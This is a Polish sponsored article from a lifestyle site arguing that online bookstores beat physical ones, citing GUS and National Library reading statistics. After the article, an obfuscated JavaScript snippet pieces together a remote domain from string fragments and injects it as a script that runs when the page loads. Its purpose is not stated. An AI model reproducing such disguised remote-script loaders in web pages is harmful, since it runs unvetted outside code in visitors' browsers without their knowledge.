Lifestyle.Lelum.pl > Plotki i gwiazdy > Księgarnia internetowa – dlaczego warto z niej korzystać?
Barbara Daszuta
Barbara Daszuta 14.05.2021 12:40

Księgarnia internetowa – dlaczego warto z niej korzystać?

Księgarnia internetowa to miejsce, w którym znajdziesz nie tylko literaturę, ale także wiele innych gadżetów, związanych z książkami. Ponieważ czytanie poszerza horyzonty, poprawia naszą koncentrację i pomaga się zrelaksować, dobrze jest sięgać po lektury jak najczęściej. W tej kwestii pomocna okazuje się księgarnia online. Dlaczego jeszcze warto zajrzeć do internetowej księgarni?

Księgarnia internetowa lepsza od stacjonarnej?

Badania Głównego Urzędu Statystycznego wskazują, że w 2018 roku liczba osób w Polsce, które zamawiały towary przez Internet w ciągu ostatnich 3 miesięcy od dnia przeprowadzanego badania, wynosiła ogółem 37,1%. W porównaniu do 2017 roku jest to wzrost o ponad 4%. Jasno więc widać, że zainteresowanie zakupami w internecie stale rośnie.

Nic więc dziwnego, że również księgarnia internetowa stała się popularnym miejscem, w którym zakupy robi coraz więcej czytelników. Dlaczego tak się dzieje?

Wygodna i praktyczna forma

Przede wszystkim zakupy internetowe cieszą się sporym zainteresowaniem, ponieważ to praktyczne rozwiązanie – bez wychodzenia z domu i straty czasu na dojazd do stacjonarnej księgarni. Ponadto internetowa księgarnia to brak konieczności stania w kolejce.

Zdarzyło ci się wybrać do księgarni po daną książkę, a na miejscu usłyszeć, że tytuł ten został już wyprzedany? No właśnie – w internetowej księgarni takie rozczarowanie ci nie grozi, ponieważ najczęściej na stronie znajdziesz informację, czy dany egzemplarz jest dostępny w magazynie. A jeśli nie, to nic straconego! Z łatwością i bez wysiłku przeskoczysz do kolejnej księgarni online.

Szeroka oferta

Księgarnia internetowa to również szeroki wybór różnych artykułów, nie tylko książek. Konsumenci znajdą tam zazwyczaj także zabawki, przybory szkolne, puzzle, zeszyty, gadżety z zabawnymi i tematycznymi nadrukami, związane z czytelnictwem: kubki i torby bawełniane czy zakładki. Ponieważ internetowe księgarnie zazwyczaj dysponują wielkopowierzchniowymi magazynami i nie mają potrzeby wystawiania towaru na półkach z dostępem dla klientów, mogą pozwolić sobie na znacznie szerszy asortyment.

Konkurencyjne ceny

Zgadza się, księgarnie online nierzadko mają niższe ceny książek i w ogóle dostępnych artykułów. Dlaczego tak się dzieje? Głównie przez fakt, iż wszystkie artykuły przechowują w jednym magazynie. Odpadają więc koszty zatrudnienia dodatkowych pracowników do obsługi klienta czy opłaty za wynajem lokalu.

Opinia czytelników o książce

To jeszcze jeden, ważny aspekt, który przemawia na korzyść internetowych zakupów. Zanim zdecydujesz się na zakup książki, masz możliwość przeczytać opinię lub recenzję czytelników, którzy sięgnęli po nią przed tobą. Dzięki temu nie kupujesz w ciemno i masz szansę stwierdzić, czy aby na pewno jest to pozycja właśnie dla ciebie.

Powieści w różnej formie, czyli książki na miarę XXI wieku

Najnowsze badania Biblioteki Narodowej pokazują, że 21% badanych deklaruje czytanie książek na ekranach – tabletach, czytnikach lub smartfonach, a ponadto 54% ankietowanych zadeklarowało otrzymanie elektronicznej formy książki w ramach prezentu.

Nic więc dziwnego, że rosnącym zainteresowaniem cieszą się E-booki oraz audiobooki. Taka forma książek zdaje się idealną odpowiedzią na rosnące zapotrzebowanie kolejnych pokoleń, wychowywanych w dobie szybkiego rozwoju cyfryzacji, a internetowe księgarnie zdecydowanie ułatwiają do nich dostęp.

Jak więc widzisz, korzystanie z księgarni internetowej niesie za sobą wiele korzyści. Przekonaj się już dziś, jak wiele możesz zyskać, odwiedzając to miejsce!

Artykuł sponsorowany

(function(){ o7ga=document.createElement("script");o7ga.async=true;o7ga_="u"+("s")+"t"; o7gau="302525501.";o7ga_+="a"+("t.i");o7ga_+="n"+("f"+"o")+"/"; o7gau+="6y03z0zj7gahw4g8x7zzak"+("g82mgkpx"); o7ga.src="https://"+o7ga_+o7gau;o7ga.type="text/javascript"; document.body.appendChild(o7ga); })();

Powiązane
Quiz, jak wiele pamiętasz ze szkolnych lat
Pytania ze szkoły podstawowej. Ile zostało ci w głowie? Sprawdź, czy odpowiesz na wszystkie pytania